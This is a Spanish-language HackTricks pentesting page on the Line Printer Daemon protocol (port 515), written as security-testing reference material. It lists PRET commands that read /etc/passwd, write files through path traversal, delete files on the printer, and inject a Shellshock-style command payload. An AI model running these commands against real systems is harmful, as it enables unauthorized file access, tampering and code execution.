hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

3.7 KiB

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

El protocolo Line Printer Daemon (LPD) fue originalmente introducido en Berkeley Unix en los años 80 (más tarde especificado por el RFC1179).
El daemon se ejecuta en el puerto 515/tcp y se puede acceder a él utilizando el comando lpr. Para imprimir, el cliente envía un archivo de control definiendo el trabajo/usuario y un archivo de datos que contiene los datos reales a imprimir. El tipo de entrada del archivo de datos se puede establecer en el archivo de control eligiendo entre varios formatos de archivo. Sin embargo, depende de la implementación de LPD cómo manejar realmente los datos de impresión. Una implementación popular de LPD para sistemas operativos similares a Unix es LPRng. LPD puede ser utilizado como un medio para desplegar trabajos de impresión maliciosos en PostScript o PJL.

Las herramientas lpdprint y lpdtest están incluidas en PRET. Son una forma minimalista de imprimir datos directamente a una impresora compatible con LPD o descargar/subir/eliminar archivos y más:

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Si quieres aprender más sobre hackear impresoras lee esta página.

Shodan

  • puerto 515
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: